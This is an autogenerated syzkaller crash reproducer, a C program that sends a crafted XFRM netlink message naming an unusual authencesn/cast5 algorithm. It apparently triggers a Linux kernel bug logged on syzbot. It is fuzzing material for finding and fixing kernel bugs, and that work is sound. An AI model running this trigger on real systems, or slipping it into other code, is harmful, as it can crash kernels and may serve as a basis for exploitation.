// https://syzkaller.appspot.com/bug?id=d76b65a985a4cbf10165b3cbb882f59a0ab090bd
// autogenerated by syzkaller (http://github.com/google/syzkaller)

#define _GNU_SOURCE
#include <endian.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef __NR_sendmsg
#define __NR_sendmsg 370
#endif
#ifndef __NR_mmap
#define __NR_mmap 192
#endif
#ifndef __NR_socket
#define __NR_socket 359
#endif
#undef __NR_mmap
#define __NR_mmap __NR_mmap2

long r[1];
void loop()
{
  memset(r, -1, sizeof(r));
  r[0] = syscall(__NR_socket, 0x10, 2, 0xc);
  *(uint32_t*)0x20122fc8 = 0x200ef000;
  *(uint16_t*)0x200ef000 = 0x10;
  *(uint16_t*)0x200ef002 = 0;
  *(uint32_t*)0x200ef004 = 0;
  *(uint32_t*)0x200ef008 = 0;
  *(uint32_t*)0x20122fcc = 0xc;
  *(uint32_t*)0x20122fd0 = 0x20c00000;
  *(uint32_t*)0x20c00000 = 0x203e7ec4;
  *(uint32_t*)0x203e7ec4 = 0x13c;
  *(uint16_t*)0x203e7ec8 = 0x10;
  *(uint16_t*)0x203e7eca = 0;
  *(uint32_t*)0x203e7ecc = 0;
  *(uint32_t*)0x203e7ed0 = 0;
  *(uint32_t*)0x203e7ed4 = htobe32(0x7f000001);
  *(uint8_t*)0x203e7ee4 = 0xac;
  *(uint8_t*)0x203e7ee5 = 0x14;
  *(uint8_t*)0x203e7ee6 = 0;
  *(uint8_t*)0x203e7ee7 = 0;
  *(uint16_t*)0x203e7ef4 = 0;
  *(uint16_t*)0x203e7ef6 = htobe16(0);
  *(uint16_t*)0x203e7ef8 = 0;
  *(uint16_t*)0x203e7efa = htobe16(0);
  *(uint16_t*)0x203e7efc = 0;
  *(uint8_t*)0x203e7efe = 0;
  *(uint8_t*)0x203e7eff = 0;
  *(uint8_t*)0x203e7f00 = 0;
  *(uint32_t*)0x203e7f04 = 0;
  *(uint32_t*)0x203e7f08 = 0;
  *(uint32_t*)0x203e7f0c = htobe32(0xe0000002);
  *(uint32_t*)0x203e7f1c = 0;
  *(uint8_t*)0x203e7f20 = 0;
  *(uint32_t*)0x203e7f24 = htobe32(-1);
  *(uint64_t*)0x203e7f34 = 0;
  *(uint64_t*)0x203e7f3c = 0;
  *(uint64_t*)0x203e7f44 = 0;
  *(uint64_t*)0x203e7f4c = 0;
  *(uint64_t*)0x203e7f54 = 0;
  *(uint64_t*)0x203e7f5c = 0;
  *(uint64_t*)0x203e7f64 = 0;
  *(uint64_t*)0x203e7f6c = 0;
  *(uint64_t*)0x203e7f74 = 0;
  *(uint64_t*)0x203e7f7c = 0;
  *(uint64_t*)0x203e7f84 = 0;
  *(uint64_t*)0x203e7f8c = 0;
  *(uint32_t*)0x203e7f94 = 0;
  *(uint32_t*)0x203e7f98 = 0;
  *(uint32_t*)0x203e7f9c = 0;
  *(uint32_t*)0x203e7fa0 = 0;
  *(uint32_t*)0x203e7fa4 = 0;
  *(uint16_t*)0x203e7fa8 = 0;
  *(uint8_t*)0x203e7faa = 0;
  *(uint8_t*)0x203e7fab = 0;
  *(uint8_t*)0x203e7fac = 0;
  *(uint16_t*)0x203e7fb4 = 0x4c;
  *(uint16_t*)0x203e7fb6 = 0x12;
  memcpy((void*)0x203e7fb8,
         "\x61\x75\x74\x68\x65\x6e\x63\x65\x73\x6e\x28\x72\x6d\x64\x32\x35\x36"
         "\x2d\x67\x65\x6e\x65\x72\x69\x63\x2c\x63\x74\x72\x28\x63\x61\x73\x74"
         "\x35\x29\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
         64);
  *(uint32_t*)0x203e7ff8 = 0;
  *(uint32_t*)0x203e7ffc = 0;
  *(uint32_t*)0x20c00004 = 0x13c;
  *(uint32_t*)0x20122fd4 = 1;
  *(uint32_t*)0x20122fd8 = 0;
  *(uint32_t*)0x20122fdc = 0;
  *(uint32_t*)0x20122fe0 = 0;
  syscall(__NR_sendmsg, r[0], 0x20122fc8, 0);
}

int main()
{
  syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
  loop();
  return 0;
}